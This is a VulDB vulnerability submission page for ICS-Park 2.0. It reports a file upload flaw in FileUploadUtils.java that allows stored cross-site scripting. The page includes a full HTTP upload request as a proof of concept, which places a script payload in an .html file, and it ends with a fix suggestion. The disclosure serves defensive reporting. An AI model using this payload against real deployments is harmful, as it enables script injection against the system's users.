Submit #646303: fcba_zzm ics-park 2.0 Unrestricted Uploadinfo

Titelfcba_zzm ics-park 2.0 Unrestricted Upload
BeschreibungICS-Park Improper File Upload Extension Validation Leading to Stored Cross-Site Scripting (XSS) # NAME OF AFFECTED PRODUCT(S) * ics-park ## Vendor Homepage https://gitee.com/fcba_zzm/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter * yyjccc ## Vulnerable File * FileUploadUtils.java ## VERSION(S) * V2.0 ## Software Link * [https://gitee.com/fcba_zzm/ics-park](https://gitee.com/fcba_zzm/ics-park) # PROBLEM TYPE ## Vulnerability Type * improper file upload → stored XSS ## Root Cause The vulnerability originates from improper validation of uploaded file types in the ICS-Park file upload module. The system only performs weak or incomplete checks on file extensions, allowing files with dangerous types (e.g., .html, .xml) to be uploaded. Because these files are stored in a web-accessible location and served without proper content-type enforcement or sanitization, they can be interpreted as executable code in the browser. ## Impact * Attackers can manipulate authenticated users into performing actions like changing passwords or modifying account settings, all without the user’s consent. Successful exploitation can lead to: * Unauthorized account access or data manipulation. * Privilege escalation or unauthorized actions performed on behalf of the user. * Potential data loss or unauthorized data leakage. # DESCRIPTION * ICS-Park suffers from improper file upload validation, where the system does not strictly restrict dangerous file extensions. An attacker can upload malicious files such as `.html` or `.xml`. When accessed, these files are rendered directly in the victim’s browser, allowing arbitrary JavaScript execution. This issue enables a **Stored Cross-Site Scripting (XSS) vulnerability**, which could be exploited by an authenticated attacker. # Vulnerability details and POC ## Vulnerability lonameion: * **​`FileUploadUtils.java`​** ## Payload: Log in to the system and upload the file using the following payload ```notranslate POST /api/dfs/upload HTTP/1.1 Host: localhost:9227 sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139" Origin: http://localhost:8000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJdOygUAQDhzw1zAy sec-ch-ua-platform: "Windows" Sec-Fetch-Site: same-origin Accept-Language: zh-CN,zh;q=0.9 Accept-Encoding: gzip, deflate, br, zstd Accept: application/json, text/plain, */* token: d6e3601d372b42ffb2eaad21aa6b3598 sign: 96782c8471657d1505b795009245cef0 Sec-Fetch-Dest: empty sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Sec-Fetch-Mode: cors Referer: http://localhost:8000/account/settings/base Content-Length: 16305 ------WebKitFormBoundaryJdOygUAQDhzw1zAy Content-Disposition: form-data; name="file"; filename="xx.html" Content-Type: image/jpeg hi,test!<script>alert('xss')</script> ------WebKitFormBoundaryJdOygUAQDhzw1zAy-- ``` ## The following are screenshots of some specific information obtained from testing and running: <img width="1555" height="575" alt="Image" src="https://github.com/user-attachments/assets/88cb862c-a6fd-4130-9488-a20c7985d9a0" /> <img width="1707" height="807" alt="Image" src="https://github.com/user-attachments/assets/12a7c689-0a8e-4ae7-9204-ea893fcce1a8" /> # Suggested repair 1. **Strict File Extension Whitelisting** Only allow safe extensions (e.g., .jpg, .png, .gif) and reject dangerous ones (e.g., .xml, .html).
Quelle⚠️ https://github.com/Yyjccc/CVE/issues/2
Benutzer
 Yyjccc (UID 89726)
Einreichung02.09.2025 18:26 (vor 8 Monaten)
Moderieren13.09.2025 21:23 (11 days later)
StatusAkzeptiert
VulDB Eintrag323833 [fcba_zzm ics-park Smart Park Management System 2.0 FileUploadUtils.java Datei erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Do you need the next level of professionalism?

Upgrade your account now!